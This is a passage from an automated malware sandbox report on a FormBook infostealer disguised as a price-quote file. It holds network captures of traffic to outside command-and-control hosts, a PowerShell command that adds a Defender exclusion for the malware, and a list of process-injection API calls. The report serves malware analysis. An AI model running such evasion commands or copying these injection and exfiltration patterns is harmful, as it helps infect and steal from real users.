60 4e bd 53 a6 ce a1 24 2b d1 b2 92 0e 17 e3 19 6b e9 1d fb a4 c3 80 e5 8d f2 1f f5 79 7f 76 56 92 3c 4e a5 44 75 53 5b ea 8d 64 15 69 b2 39 0c 8d f2 18 53 25 4b a9 45 75 13 2d b4 47 bb d3 34 b0 43 0e [TRUNCATED]
                Data Ascii: 49fV6}~DAPIB+{EZ"G%)N/(R^mv _dv]<Vo-LhPbQ&+:>G7o6B6dFY*Y!e$C;<ipH25\G*:V9w1[VcT[=YbB&xr.~t`NS$+kyvV<NDuS[di9S%KEu-G4CM?RUm*4muZsiLW#Koa9W}3Z&T-a}){Dc'gallr-g.nGZtZM)SK=RiRu#)3U+j|`>uwGZ;aE!i<uz?e2JMSvsX?3|BO.c0)<=?hX[aV
                Jul 3, 2024 08:56:39.743175030 CEST591INData Raw: d5 f5 7a f4 4a e7 56 98 89 4b a1 35 ac 96 e7 0e 50 b8 14 de 3b b4 cc a1 c6 ca cf b3 ee d1 7a 55 09 3d 35 d3 2a 29 75 3a 1b a7 c9 5c 27 aa 91 9e 70 41 22 bb ce 0b df 3b d6 a2 73 a2 c6 44 f4 69 b6 31 f9 fb 82 8f 82 11 a4 63 b1 58 14 5a 99 1b b0 a8
                Data Ascii: zJVK5P;zU=5*)u:\'pA";sDi1cXZ7hv<;8^rdeg9p5FMd,+.<I+I%7YEV(mI,RD:u}RY4LY/Y:+yrTn0b6Gs


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                44192.168.2.94975866.235.200.146801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:56:41.357758045 CEST473OUTGET /0rsk/?hH=VoD++N0hxznoRAwvUr4uLQfJYOkKZkNbUm2XKd+d5dQonHhfXy1Wde6i6X/1IJHjaG3HR8hpE35h9XRxGXBI9lLHHMR3rtgWi8G/40reX/Z08eN34A==&4Z=FRPPB0TP0VK82R4 HTTP/1.1
                Host: www.stefanogaus.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:56:42.050311089 CEST801INHTTP/1.1 301 Moved Permanently
                Date: Wed, 03 Jul 2024 06:56:42 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                X-Redirect-By: WordPress
                Location: http://stefanogaus.com/0rsk/?hH=VoD++N0hxznoRAwvUr4uLQfJYOkKZkNbUm2XKd+d5dQonHhfXy1Wde6i6X/1IJHjaG3HR8hpE35h9XRxGXBI9lLHHMR3rtgWi8G/40reX/Z08eN34A==&4Z=FRPPB0TP0VK82R4
                host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                X-Newfold-Cache-Level: 2
                X-Endurance-Cache-Level: 2
                X-nginx-cache: WordPress
                CF-Cache-Status: MISS
                Set-Cookie: _cfuvid=Hq2KKU0W0dfbvCTweY6smCUdRQeiiq2SLvQL46Mr9RU-1719989802004-0.0.1.1-604800000; path=/; domain=.www.stefanogaus.com; HttpOnly
                Server: cloudflare
                CF-RAY: 89d4fa24fb484376-EWR
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                45192.168.2.94975923.111.180.146801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:56:50.135997057 CEST477OUTGET /vpfr/?4Z=FRPPB0TP0VK82R4&hH=YJOYlkuNdHbUbxIU0duDsGwGBWmXVvvP+a5ZIsJaJ66fRzvfH4BZf/UT7tP0StNW9dLVB8Be+XMnEr4f4IOQu0h2rMKukEsZCuMbbpIHNAKNxYQHAA== HTTP/1.1
                Host: www.highwavesmarine.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:56:50.652805090 CEST193INHTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 06:56:50 GMT
                Server: Apache
                Connection: close
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Data Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a
                Data Ascii: 10File not found.0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                46192.168.2.949760103.197.25.241801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:56:55.682832003 CEST722OUTPOST /vfca/ HTTP/1.1
                Host: www.dxgsf.shop
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 191
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.dxgsf.shop
                Referer: http://www.dxgsf.shop/vfca/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 43 68 47 74 5a 36 31 72 50 4e 67 64 52 4c 63 4d 50 54 47 42 7a 6e 54 31 69 78 6e 6e 37 54 56 41 72 49 46 41 4c 69 6e 66 56 53 52 71 79 45 72 41 67 5a 51 49 35 78 4e 30 52 46 53 77 52 70 4b 48 5a 2f 46 42 39 2f 42 49 48 6d 65 6a 72 58 30 77 4d 35 52 73 35 52 31 63 67 4e 37 70 72 71 74 69 7a 2b 6d 6b 62 74 54 50 75 4a 50 51 73 75 79 4a 67 30 34 52 34 78 43 50 35 62 4f 70 65 74 46 36 34 6b 37 47 72 42 47 33 6d 65 37 61 58 65 48 52 50 44 4e 77 59 73 48 33 39 6b 61 4c 6f 39 76 6a 36 51 6a 4b 42 45 6a 36 4c 66 48 78 54 76 4b 48 6a 4e 2f 42 6e 33 54 5a 53 2f 6e 38
                Data Ascii: hH=ChGtZ61rPNgdRLcMPTGBznT1ixnn7TVArIFALinfVSRqyErAgZQI5xN0RFSwRpKHZ/FB9/BIHmejrX0wM5Rs5R1cgN7prqtiz+mkbtTPuJPQsuyJg04R4xCP5bOpetF64k7GrBG3me7aXeHRPDNwYsH39kaLo9vj6QjKBEj6LfHxTvKHjN/Bn3TZS/n8
                Jul 3, 2024 08:56:56.594702959 CEST289INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Wed, 03 Jul 2024 06:56:56 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:02:52:48
                Start date:03/07/2024
                Path:C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
                Imagebase:0xaf0000
                File size:721'920 bytes
                MD5 hash:7C9C6894AC6C53F5066C4E42A0E2121F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                General

                Target ID:3
                Start time:02:52:49
                Start date:03/07/2024
                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
                Imagebase:0x470000
                File size:433'152 bytes
                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:4
                Start time:02:52:49
                Start date:03/07/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff70f010000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:5
                Start time:02:52:49
                Start date:03/07/2024
                Path:C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
                Wow64 process (32bit):false
                Commandline:"C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
                Imagebase:0xb0000
                File size:721'920 bytes
                MD5 hash:7C9C6894AC6C53F5066C4E42A0E2121F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                General

                Target ID:6
                Start time:02:52:49
                Start date:03/07/2024
                Path:C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
                Wow64 process (32bit):false
                Commandline:"C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
                Imagebase:0x300000
                File size:721'920 bytes
                MD5 hash:7C9C6894AC6C53F5066C4E42A0E2121F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                General

                Target ID:7
                Start time:02:52:49
                Start date:03/07/2024
                Path:C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
                Imagebase:0xf40000
                File size:721'920 bytes
                MD5 hash:7C9C6894AC6C53F5066C4E42A0E2121F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1542475565.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.1542475565.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1543709314.00000000027F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.1543709314.00000000027F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                Reputation:low
                Has exited:true

                General

                Target ID:8
                Start time:02:53:04
                Start date:03/07/2024
                Path:C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe"
                Imagebase:0xe10000
                File size:140'800 bytes
                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3779117946.0000000003600000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3779117946.0000000003600000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                Reputation:high
                Has exited:false

                General

                Target ID:9
                Start time:02:53:05
                Start date:03/07/2024
                Path:C:\Windows\SysWOW64\unregmp2.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\SysWOW64\unregmp2.exe"
                Imagebase:0xf70000
                File size:214'528 bytes
                MD5 hash:51629AAAF753C6411D0B7D37620B7A83
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3779603566.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3779603566.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3779712875.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3779712875.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                Reputation:moderate
                Has exited:false

                General

                Target ID:13
                Start time:02:53:18
                Start date:03/07/2024
                Path:C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe"
                Imagebase:0xe10000
                File size:140'800 bytes
                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3781878826.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3781878826.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                Reputation:high
                Has exited:false

                General

                Target ID:14
                Start time:02:53:30
                Start date:03/07/2024
                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                Imagebase:0x7ff73feb0000
                File size:676'768 bytes
                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Disassembly

                Reset < >

                  Execution Graph

                  Execution Coverage:10.9%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:0%
                  Total number of Nodes:215
                  Total number of Limit Nodes:9
                  execution_graph 22262 75d75af 22263 75d75b9 22262->22263 22264 75d78e2 22262->22264 22268 75d84de 22263->22268 22284 75d8480 22263->22284 22299 75d8470 22263->22299 22269 75d846c 22268->22269 22270 75d84e1 22268->22270 22274 75d840c 22269->22274 22315 75d8c51 22269->22315 22320 75d8b3b 22269->22320 22324 75d8d42 22269->22324 22329 75d8aa3 22269->22329 22333 75d8903 22269->22333 22338 75d8a00 22269->22338 22343 75d8f01 22269->22343 22348 75d8e01 22269->22348 22352 75d8a6a 22269->22352 22358 75d8e6f 22269->22358 22362 75d928d 22269->22362 22366 75d8a32 22269->22366 22270->22264 22274->22264 22285 75d849a 22284->22285 22286 75d84be 22285->22286 22287 75d8b3b 2 API calls 22285->22287 22288 75d8c51 2 API calls 22285->22288 22289 75d8a32 2 API calls 22285->22289 22290 75d928d 2 API calls 22285->22290 22291 75d8e6f 2 API calls 22285->22291 22292 75d8a6a 4 API calls 22285->22292 22293 75d8e01 2 API calls 22285->22293 22294 75d8f01 2 API calls 22285->22294 22295 75d8a00 2 API calls 22285->22295 22296 75d8903 2 API calls 22285->22296 22297 75d8aa3 2 API calls 22285->22297 22298 75d8d42 2 API calls 22285->22298 22286->22264 22287->22286 22288->22286 22289->22286 22290->22286 22291->22286 22292->22286 22293->22286 22294->22286 22295->22286 22296->22286 22297->22286 22298->22286 22300 75d840c 22299->22300 22301 75d847f 22299->22301 22300->22264 22302 75d84be 22301->22302 22303 75d8b3b 2 API calls 22301->22303 22304 75d8c51 2 API calls 22301->22304 22305 75d8a32 2 API calls 22301->22305 22306 75d928d 2 API calls 22301->22306 22307 75d8e6f 2 API calls 22301->22307 22308 75d8a6a 4 API calls 22301->22308 22309 75d8e01 2 API calls 22301->22309 22310 75d8f01 2 API calls 22301->22310 22311 75d8a00 2 API calls 22301->22311 22312 75d8903 2 API calls 22301->22312 22313 75d8aa3 2 API calls 22301->22313 22314 75d8d42 2 API calls 22301->22314 22302->22264 22303->22302 22304->22302 22305->22302 22306->22302 22307->22302 22308->22302 22309->22302 22310->22302 22311->22302 22312->22302 22313->22302 22314->22302 22316 75d8c6c 22315->22316 22370 75d6e68 22316->22370 22374 75d6e60 22316->22374 22317 75d8afe 22322 75d6e68 WriteProcessMemory 22320->22322 22323 75d6e60 WriteProcessMemory 22320->22323 22321 75d8b5f 22321->22274 22322->22321 22323->22321 22325 75d8c6c 22324->22325 22326 75d8afe 22325->22326 22327 75d6e68 WriteProcessMemory 22325->22327 22328 75d6e60 WriteProcessMemory 22325->22328 22327->22326 22328->22326 22379 75d6f58 22329->22379 22383 75d6f52 22329->22383 22330 75d8ac8 22334 75d8909 22333->22334 22387 75d70e6 22334->22387 22391 75d70f0 22334->22391 22339 75d8a2b 22338->22339 22341 75d6e68 WriteProcessMemory 22339->22341 22342 75d6e60 WriteProcessMemory 22339->22342 22340 75d919e 22341->22340 22342->22340 22344 75d92d1 22343->22344 22395 75d6cc8 22344->22395 22399 75d6cd0 22344->22399 22345 75d92ec 22349 75d8a31 22348->22349 22403 75d67e8 22349->22403 22407 75d67e0 22349->22407 22356 75d6cc8 Wow64SetThreadContext 22352->22356 22357 75d6cd0 Wow64SetThreadContext 22352->22357 22353 75d8a84 22354 75d67e8 ResumeThread 22353->22354 22355 75d67e0 ResumeThread 22353->22355 22354->22353 22355->22353 22356->22353 22357->22353 22411 75d6da8 22358->22411 22415 75d6da0 22358->22415 22359 75d8e8d 22363 75d91e7 22362->22363 22364 75d67e8 ResumeThread 22363->22364 22365 75d67e0 ResumeThread 22363->22365 22364->22363 22365->22363 22367 75d8a4a 22366->22367 22368 75d67e8 ResumeThread 22367->22368 22369 75d67e0 ResumeThread 22367->22369 22368->22367 22369->22367 22371 75d6eb0 WriteProcessMemory 22370->22371 22373 75d6f07 22371->22373 22373->22317 22375 75d6e4b 22374->22375 22376 75d6e66 WriteProcessMemory 22374->22376 22375->22317 22378 75d6f07 22376->22378 22378->22317 22380 75d6fa3 ReadProcessMemory 22379->22380 22382 75d6fe7 22380->22382 22382->22330 22384 75d6fa3 ReadProcessMemory 22383->22384 22386 75d6fe7 22384->22386 22386->22330 22388 75d7179 CreateProcessA 22387->22388 22390 75d733b 22388->22390 22390->22390 22392 75d7179 CreateProcessA 22391->22392 22394 75d733b 22392->22394 22396 75d6d15 Wow64SetThreadContext 22395->22396 22398 75d6d5d 22396->22398 22398->22345 22400 75d6d15 Wow64SetThreadContext 22399->22400 22402 75d6d5d 22400->22402 22402->22345 22404 75d6828 ResumeThread 22403->22404 22406 75d6859 22404->22406 22406->22349 22408 75d6828 ResumeThread 22407->22408 22410 75d6859 22408->22410 22410->22349 22412 75d6de8 VirtualAllocEx 22411->22412 22414 75d6e25 22412->22414 22414->22359 22416 75d6de8 VirtualAllocEx 22415->22416 22418 75d6e25 22416->22418 22418->22359 22419 11d4668 22420 11d4672 22419->22420 22424 11d4759 22419->22424 22429 11d3e28 22420->22429 22422 11d468d 22425 11d477d 22424->22425 22433 11d4858 22425->22433 22437 11d4868 22425->22437 22430 11d3e33 22429->22430 22445 11d5c24 22430->22445 22432 11d6f8d 22432->22422 22435 11d488f 22433->22435 22434 11d496c 22434->22434 22435->22434 22441 11d44b0 22435->22441 22439 11d488f 22437->22439 22438 11d496c 22439->22438 22440 11d44b0 CreateActCtxA 22439->22440 22440->22438 22442 11d58f8 CreateActCtxA 22441->22442 22444 11d59bb 22442->22444 22444->22444 22446 11d5c2f 22445->22446 22449 11d5c44 22446->22449 22448 11d702d 22448->22432 22450 11d5c4f 22449->22450 22453 11d5c74 22450->22453 22452 11d7102 22452->22448 22454 11d5c7f 22453->22454 22457 11d5ca4 22454->22457 22456 11d7205 22456->22452 22458 11d5caf 22457->22458 22460 11d850b 22458->22460 22463 11dabba 22458->22463 22459 11d8549 22459->22456 22460->22459 22467 11dccbc 22460->22467 22472 11dabf0 22463->22472 22476 11dabe0 22463->22476 22464 11dabce 22464->22460 22468 11dccd9 22467->22468 22469 11dccfd 22468->22469 22509 11dce58 22468->22509 22513 11dce68 22468->22513 22469->22459 22481 11dacd8 22472->22481 22489 11dace8 22472->22489 22473 11dabff 22473->22464 22477 11dabf0 22476->22477 22479 11dacd8 2 API calls 22477->22479 22480 11dace8 2 API calls 22477->22480 22478 11dabff 22478->22464 22479->22478 22480->22478 22482 11dacf9 22481->22482 22483 11dad1c 22481->22483 22482->22483 22497 11daf70 22482->22497 22501 11daf80 22482->22501 22483->22473 22484 11dad14 22484->22483 22485 11daf20 GetModuleHandleW 22484->22485 22486 11daf4d 22485->22486 22486->22473 22490 11dacf9 22489->22490 22491 11dad1c 22489->22491 22490->22491 22495 11daf70 LoadLibraryExW 22490->22495 22496 11daf80 LoadLibraryExW 22490->22496 22491->22473 22492 11dad14 22492->22491 22493 11daf20 GetModuleHandleW 22492->22493 22494 11daf4d 22493->22494 22494->22473 22495->22492 22496->22492 22498 11daf94 22497->22498 22499 11dafb9 22498->22499 22505 11da070 22498->22505 22499->22484 22502 11daf94 22501->22502 22503 11da070 LoadLibraryExW 22502->22503 22504 11dafb9 22502->22504 22503->22504 22504->22484 22506 11db160 LoadLibraryExW 22505->22506 22508 11db1d9 22506->22508 22508->22499 22512 11dce75 22509->22512 22510 11dceaf 22510->22469 22512->22510 22517 11dba20 22512->22517 22514 11dce75 22513->22514 22515 11dceaf 22514->22515 22516 11dba20 3 API calls 22514->22516 22515->22469 22516->22515 22518 11dba2b 22517->22518 22520 11ddbc8 22518->22520 22521 11dd21c 22518->22521 22520->22520 22522 11dd227 22521->22522 22523 11d5ca4 3 API calls 22522->22523 22524 11ddc37 22523->22524 22524->22520 22253 75d9b30 22254 75d9cbb 22253->22254 22256 75d9b56 22253->22256 22256->22254 22257 75d963c 22256->22257 22258 75d9db0 PostMessageW 22257->22258 22259 75d9e1c 22258->22259 22259->22256 22260 11dd5d0 DuplicateHandle 22261 11dd666 22260->22261 22525 11dcf80 22526 11dcfc6 GetCurrentProcess 22525->22526 22528 11dd018 GetCurrentThread 22526->22528 22531 11dd011 22526->22531 22529 11dd055 GetCurrentProcess 22528->22529 22532 11dd04e 22528->22532 22530 11dd08b 22529->22530 22533 11dd0b3 GetCurrentThreadId 22530->22533 22531->22528 22532->22529 22534 11dd0e4 22533->22534

                  Executed Functions

                  Function 075D1870 Relevance: .1, Instructions: 67COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f8736ceab1e4f6e9a89e6476619339510bdd85ed6aaa29b817ea09eb08a72213
                  • Instruction ID: 13c50f6224c7a2d88dbbc3c6145387838ffe0182257bb39519cb10697d506262
                  • Opcode Fuzzy Hash: f8736ceab1e4f6e9a89e6476619339510bdd85ed6aaa29b817ea09eb08a72213
                  • Instruction Fuzzy Hash: 742128B1D056188BEB18CFAAD9143DEFFF6BFC9300F04C06AD408A6264EB7409458F60
                  Function 075D1880 Relevance: .1, Instructions: 60COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d5deb51970e43b1d2ca3adf93a6b1159908b4f653c7f2042f7b38ade67ce974b
                  • Instruction ID: 1c24a81cd3a895a7284e3221c0e24119e65dc0c194f12ee6ee9215c568690f9b
                  • Opcode Fuzzy Hash: d5deb51970e43b1d2ca3adf93a6b1159908b4f653c7f2042f7b38ade67ce974b
                  • Instruction Fuzzy Hash: 2E21E3B1D156188BEB18CFABC9553DEFAF6BFC9300F04C02AD40866264EB7509458F90
                  Function 011DCF71 Relevance: 6.1, APIs: 4, Instructions: 148threadCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • GetCurrentProcess.KERNEL32 ref: 011DCFFE
                  • GetCurrentThread.KERNEL32 ref: 011DD03B
                  • GetCurrentProcess.KERNEL32 ref: 011DD078
                  • GetCurrentThreadId.KERNEL32 ref: 011DD0D1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1326462522.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_11d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: Current$ProcessThread
                  • String ID:
                  • API String ID: 2063062207-0
                  • Opcode ID: 09da695ce705d7d4db2da312a344078ac5d1fd7c73fe007d1b74a72badceed5d
                  • Instruction ID: 4c6ba27685a46a87045948bd22f61e3db55e850a0139a6303410f317f393dcaf
                  • Opcode Fuzzy Hash: 09da695ce705d7d4db2da312a344078ac5d1fd7c73fe007d1b74a72badceed5d
                  • Instruction Fuzzy Hash: CC6155B09012099FDB58DFA9E548BDEBBF1FF88314F20846AE409A73A0D7349945CB65
                  Function 011DCF80 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • GetCurrentProcess.KERNEL32 ref: 011DCFFE
                  • GetCurrentThread.KERNEL32 ref: 011DD03B
                  • GetCurrentProcess.KERNEL32 ref: 011DD078
                  • GetCurrentThreadId.KERNEL32 ref: 011DD0D1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1326462522.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_11d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: Current$ProcessThread
                  • String ID:
                  • API String ID: 2063062207-0
                  • Opcode ID: 2f52899c065c22d90786ec7b61b1a94b00d5e64531bf5c80fa36c6c1d3b761f1
                  • Instruction ID: 304c0a8db1c59bb11eb14154c1e03ea2d4f816995aca2ee63263da21ded30216
                  • Opcode Fuzzy Hash: 2f52899c065c22d90786ec7b61b1a94b00d5e64531bf5c80fa36c6c1d3b761f1
                  • Instruction Fuzzy Hash: 185135B09003498FEB58CFA9D548BDEBBF1EB88314F20846AE419A73A0D7745945CB65
                  Function 075D70E6 Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
